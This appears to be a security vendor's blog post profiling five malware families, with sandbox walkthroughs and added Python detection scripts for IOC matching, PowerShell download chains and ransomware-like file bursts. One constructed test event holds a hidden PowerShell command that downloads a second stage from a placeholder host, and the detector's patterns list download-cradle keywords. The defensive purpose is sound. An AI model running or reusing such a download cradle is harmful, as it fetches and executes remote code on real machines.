2024 saw many high-profile cyber attacks, with major companies such as Dell and TicketMaster falling victim to data breaches and other infrastructure breaches. In 2025, this trend will continue. Therefore, to be prepared for any malware attacks, every organization must know their cyber enemy in advance. Here are 5 common malware families you can start preparing against right now.
Lumma
Lumma is a widely available malware designed to steal sensitive information. It has been openly sold on the Dark Web since 2022. This malware can effectively collect and extract data from targeted applications, including login credentials, financial information, and personal data.
Lumma is regularly updated to expand its capabilities. It can record detailed information from compromised systems, such as browsing history and cryptocurrency wallet data. It can be used to install other malware on infected devices. In 2024, Lumma was distributed using various methods, including fake CAPTCHA pages, torrents, and targeted phishing emails.
Lumma Attack Analysis
Preventive analysis of suspicious files and URLs in the sandbox can effectively help you prevent Lumma infection.
Let’s see how you can do it with the help of the ANY.RUN cloud sandbox. Not only does it deliver final verdicts on malware and phishing along with actionable indicators, it also allows you to interact with the threat and the system in real time.
Take a look at this analysis of a Lumma attack.
ANY.RUN allows you to manually open files and run executables
It starts with an archive containing an executable file. After running the .exe file, the sandbox automatically logs all processes and network activity, showing Lumma activities.
Suricata IDS informs us of a malicious connection to the Lumma C2 server
It connects to its management server (C2).
A malicious process responsible for stealing data from the system
It then starts collecting and exfiltrating data from the machine.
You can use sandbox-derived IOCs to improve your detection systems
Once the analysis is complete, we can export a report on this sample with all the critical Indicators of Compromise (IOCs) and TTPs, which can be used to enhance your organization’s defenses against potential Lumma attacks.
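As an added example of the "use sandbox IOCs to improve your detection systems" step, the script below (not ANY.RUN's code) takes a simple type,value IOC export and matches it against proxy log lines and endpoint file-hash events. The IOC list, the export format, the log format and every domain, IP and hash in it are constructed placeholders, not real Lumma indicators; substitute the values from your own sandbox report.

```python
"""Match sandbox-exported IOCs against proxy and endpoint logs.

Added example, not ANY.RUN's code. The IOC export format, the log formats and
all indicator values below are constructed for illustration.
"""
import ipaddress
import re
from dataclasses import dataclass, field


@dataclass
class IocSet:
    domains: set = field(default_factory=set)
    ips: set = field(default_factory=set)
    sha256: set = field(default_factory=set)


def parse_iocs(text: str) -> IocSet:
    """Parse a 'type,value' export (constructed format) into typed buckets.
    Domains are lower-cased with any trailing dot removed; hashes lower-cased."""
    iocs = IocSet()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        kind, _, value = line.partition(",")
        value = value.strip().lower()
        if kind == "domain":
            iocs.domains.add(value.rstrip("."))
        elif kind == "ip":
            ipaddress.ip_address(value)  # raises ValueError on malformed input
            iocs.ips.add(value)
        elif kind == "sha256" and re.fullmatch(r"[0-9a-f]{64}", value):
            iocs.sha256.add(value)
    return iocs


# Constructed IOC export (placeholder values, not real indicators)
IOC_EXPORT = """\
# type,value
domain,example-c2.invalid
ip,203.0.113.45
sha256,aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
"""

# Constructed proxy log: timestamp host dst_host dst_ip action
PROXY_LOG = """\
2025-01-08T10:14:02Z ws-17 updates.example.com 192.0.2.10 ALLOW
2025-01-08T10:14:09Z ws-17 example-c2.invalid. 203.0.113.45 ALLOW
2025-01-08T10:15:31Z ws-22 cdn.example.org 198.51.100.7 ALLOW
"""

# Constructed endpoint file events: timestamp host path sha256
FILE_EVENTS = """\
2025-01-08T10:13:55Z ws-17 C:\\Users\\u\\Downloads\\setup.exe aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
2025-01-08T10:16:00Z ws-22 C:\\Users\\v\\Desktop\\notes.txt bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
"""

PROXY_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+)$")
FILE_RE = re.compile(r"^(\S+) (\S+) (.+) ([0-9a-fA-F]{64})$")


def match_proxy_log(log: str, iocs: IocSet) -> list:
    """One hit per log line whose destination host or IP is in the IOC set."""
    hits = []
    for line in log.splitlines():
        m = PROXY_RE.match(line)
        if not m:
            continue
        ts, host, dst_host, dst_ip, _action = m.groups()
        dst_host = dst_host.lower().rstrip(".")
        reasons = []
        if dst_host in iocs.domains:
            reasons.append("domain:" + dst_host)
        if dst_ip in iocs.ips:
            reasons.append("ip:" + dst_ip)
        if reasons:
            hits.append({"ts": ts, "host": host, "reasons": reasons})
    return hits


def match_file_hashes(events: str, iocs: IocSet) -> list:
    """One hit per file event whose SHA-256 is in the IOC set."""
    hits = []
    for line in events.splitlines():
        m = FILE_RE.match(line)
        if m and m.group(4).lower() in iocs.sha256:
            hits.append({"ts": m.group(1), "host": m.group(2), "path": m.group(3)})
    return hits


if __name__ == "__main__":
    iocs = parse_iocs(IOC_EXPORT)
    for hit in match_proxy_log(PROXY_LOG, iocs) + match_file_hashes(FILE_EVENTS, iocs):
        print(hit)
```

Normalising both sides (lower-case, trailing dot stripped) before comparing matters in practice: DNS logs often record `example-c2.invalid.` with the trailing dot, and a naive string match would miss it.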
Try all features of ANY.RUN interactive sandbox for free with a 14-day trial
XWorm
XWorm is malware that gives cybercriminals remote control over infected computers. First appearing in July 2022, it can collect a wide range of sensitive information, including financial information, browsing history, saved passwords, and cryptocurrency wallet data.
XWorm allows attackers to monitor a victim’s activities by tracking keystrokes, recording webcam images, listening to audio, scanning network connections, and viewing open windows. It can also access and manipulate a computer’s clipboard, potentially stealing cryptocurrency wallet credentials.
In 2024, XWorm was involved in many large-scale attacks, including those using CloudFlare tunnels and legitimate digital certificates.
XWorm Attack Analysis
Phishing emails are often the initial stage of XWorm attacks
In this attack, we see the original phishing email with a link to Google Drive.
A Google Drive page with a link to download a malicious archive
After clicking on the link, we are offered to download a password-protected archive.
A malicious archive with a .vbs file was opened
You can find the password in the email. After entering it, we can access the .vbs script in the .zip file.
XWorm uses MSBuild.exe to persist on the system
As soon as we run the script, the sandbox instantly detects malicious activities that eventually lead to the deployment of XWorm on the machine.
AsyncRAT
AsyncRAT is another remote access Trojan on the list. First spotted in 2019, it initially spread through spam, often using the COVID-19 pandemic as bait. Since then, the malware has gained popularity and has been used in various cyber attacks.
AsyncRAT has evolved over time to include a wide range of malicious capabilities. It can secretly record the victim’s screen actions, log keystrokes, install additional malware, steal files, maintain a constant presence on infected systems, disable security software, and launch attacks that block targeted websites.
In 2024, AsyncRAT remained a significant threat, often disguised as pirated software. It was also one of the first malware families to be distributed as part of sophisticated attacks using AI-generated scripts.
AsyncRAT Attack Analysis
Initial archive with an .exe file
In this analysis session, we see another archive with a malicious executable inside.
The PowerShell process used to download the payload
Detonating the file starts the XWorm execution chain, which involves using PowerShell scripts to retrieve additional files needed to facilitate the infection.
After the analysis is complete, the sandbox displays the final verdict on the sample.
Remcos
Remcos is malware that was marketed by its creators as a legitimate remote access tool. Since its launch in 2019, it has been used in numerous attacks to perform a wide range of malicious activities, including stealing sensitive information, remote system control, keystroke logging, screen capture, etc.
In 2024, Remcos distribution campaigns used techniques such as script-based attacks, often starting with a VBScript that runs a PowerShell script to deploy the malware, and exploited vulnerabilities such as CVE-2017-11882 using malicious XML files.
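The script-based chain described for both AsyncRAT (PowerShell retrieving additional files) and Remcos (a VBScript that runs PowerShell) leaves a recognisable process tree. The following is an added example, not ANY.RUN's code, of detection logic over process-creation events: it walks each PowerShell process's ancestry looking for a script host such as wscript.exe and flags download-cradle or encoded-command arguments. The events, pids, paths and the URL are constructed placeholders.

```python
"""Detect script-host -> PowerShell -> download chains in process events.

Added example, not ANY.RUN's code. All events, pids, paths and URLs below
are constructed; the regexes are a starting point, not a complete rule set.
"""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Arguments that commonly appear when PowerShell is used to fetch a next stage
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|\bcurl\b|\bwget\b",
    re.IGNORECASE)
ENCODED_RE = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str    # full image path
    cmdline: str


def basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(event, by_pid, max_depth=8):
    """Yield parent, grandparent, ... (bounded so a bad ppid cannot loop forever)."""
    cur = event
    for _ in range(max_depth):
        cur = by_pid.get(cur.ppid)
        if cur is None:
            return
        yield cur


def find_script_to_powershell(events):
    """Return one finding per PowerShell process that has a script host
    (wscript/cscript/mshta) anywhere in its ancestry."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if basename(e.image) not in POWERSHELL:
            continue
        chain = list(ancestors(e, by_pid))
        host = next((a for a in chain if basename(a.image) in SCRIPT_HOSTS), None)
        if host is None:
            continue
        flags = []
        if DOWNLOAD_RE.search(e.cmdline):
            flags.append("download-cradle")
        if ENCODED_RE.search(e.cmdline):
            flags.append("encoded-command")
        findings.append({
            "pid": e.pid,
            "chain": [basename(a.image) for a in reversed(chain)] + [basename(e.image)],
            "script": host.cmdline,
            "flags": flags,
        })
    return findings


# Constructed process tree mirroring the chain in the text (placeholder values)
CONSTRUCTED_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\u\Downloads\invoice.vbs"'),
    ProcEvent(300, 200, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c powershell -w hidden -c ..."),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c Invoke-WebRequest -Uri http://placeholder.invalid/stage2 "
              "-OutFile $env:TEMP\\s2.exe"),
    # Benign: an admin launching PowerShell from the desktop, no script-host parent
    ProcEvent(500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Get-ChildItem C:\\logs"),
]


if __name__ == "__main__":
    for f in find_script_to_powershell(CONSTRUCTED_EVENTS):
        print(f)
```

Walking the full ancestry rather than only the direct parent is deliberate: the intermediate cmd.exe hop in the constructed tree would otherwise hide the wscript.exe origin, and real chains add similar hops.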
Remcos Attack Analysis
Phishing email opened in the ANY.RUN interactive sandbox
In this example, we came across another phishing email containing a .zip attachment and the password for it.
cmd process used during the infection chain
The final payload uses the command line and Windows system processes to load and execute Remcos.
The MITRE ATT&CK matrix provides a comprehensive view of the techniques the malware uses
The ANY.RUN sandbox maps the entire attack chain to the MITRE ATT&CK matrix for convenience.
LockBit
LockBit is a ransomware that mainly targets Windows devices. It is considered one of the biggest ransomware threats, accounting for a significant portion of all ransomware-as-a-service (RaaS) attacks. The decentralized nature of the LockBit group has allowed it to compromise many prominent organizations around the world, including the UK’s Royal Mail and India’s National Aerospace Laboratories (in 2024).
Law enforcement took action against the LockBit group, which led to the arrest of several developers and partners. Despite these efforts, the group continues to work and plans to release a new version of LockBit 4.0 in 2025.
LockBit Attack Analysis
The LockBit ransomware is launched in a secure ANY.RUN sandbox environment
This sandbox session shows how quickly LockBit infects the system and encrypts its files.
ANY.RUN’s interactive sandbox allows you to see a static analysis of every changed file in the system
Tracking the file system changes, we can see that it changed 300 files in less than a minute.
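The "300 files in less than a minute" observation above is exactly the signal an endpoint detection can key on. Below is an added example, not ANY.RUN's code, of a sliding-window detector over file-system events: it alerts the first time one process reaches a threshold of create/modify/rename operations inside a time window. The events are constructed (a slow benign writer and a fast encryptor-like process), and the threshold of 100 operations in 60 seconds is an assumption for illustration.

```python
"""Flag a process that touches an unusual number of files in a short window.

Added example, not ANY.RUN's code. The events are constructed and the
threshold/window values are assumptions chosen for illustration.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

COUNTED_OPS = {"create", "modify", "rename"}


def parse_ts(s: str) -> datetime:
    """Parse an ISO-8601 timestamp, accepting a trailing 'Z'."""
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def detect_file_bursts(events, threshold=100, window_s=60):
    """events: iterable of (iso_ts, pid, image, op, path), in time order.
    Keeps a per-pid sliding window of counted operations and records the first
    moment a pid reaches `threshold` operations within `window_s` seconds."""
    windows = defaultdict(deque)
    alerts = {}
    for ts_s, pid, image, op, _path in events:
        if op not in COUNTED_OPS:
            continue
        ts = parse_ts(ts_s)
        q = windows[pid]
        q.append(ts)
        # Drop events that have fallen out of the window
        while q and (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold and pid not in alerts:
            alerts[pid] = {"pid": pid, "image": image, "count": len(q),
                           "first": q[0].isoformat(), "last": ts.isoformat()}
    return list(alerts.values())


def constructed_events():
    """Constructed sample: backup.exe writes 50 files over 5 minutes (benign
    rate); sample.exe renames 300 files to a new extension in about 39 s."""
    base = datetime(2025, 1, 8, 10, 0, 0, tzinfo=timezone.utc)
    events = []
    for i in range(50):
        ts = base + timedelta(seconds=i * 6)
        events.append((ts.isoformat(timespec="milliseconds"), 10, "backup.exe",
                       "modify", "D:\\share\\doc%d.docx" % i))
    for i in range(300):
        ts = base + timedelta(seconds=i * 0.13)
        events.append((ts.isoformat(timespec="milliseconds"), 77, "sample.exe",
                       "rename", "C:\\Users\\u\\Documents\\file%d.xlsx -> file%d.xlsx.locked" % (i, i)))
    events.sort(key=lambda e: parse_ts(e[0]))
    return events


if __name__ == "__main__":
    for alert in detect_file_bursts(constructed_events()):
        print(alert)
```

Because backup agents, indexers and compilers legitimately produce bursts, a deployment of this logic needs an allowlist keyed on signed image path, and a second signal such as the share of renames that change the file extension reduces false positives further.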
The ransom note instructs victims to contact the attackers
The malware also drops a ransom note with detailed instructions on how to get your data back.
Improve your preventative security with ANY.RUN’s interactive sandbox
Proactively analyzing cyber threats instead of reacting to them as soon as they become a problem for your organization is the best course of action any business can take. Make it easy with ANY.RUN’s interactive sandbox, examining all suspicious files and URLs in a secure virtual environment, helping you identify malicious content with ease.
With the ANY.RUN sandbox, your company can:
- Quickly detect and confirm malicious files and links during routine scans.
- Explore how malware works at a deeper level to uncover its tactics and strategies.
- Respond more effectively to security incidents by gathering critical threat intelligence through sandbox analysis.
Experience all the features of ANY.RUN with a 14-day free trial.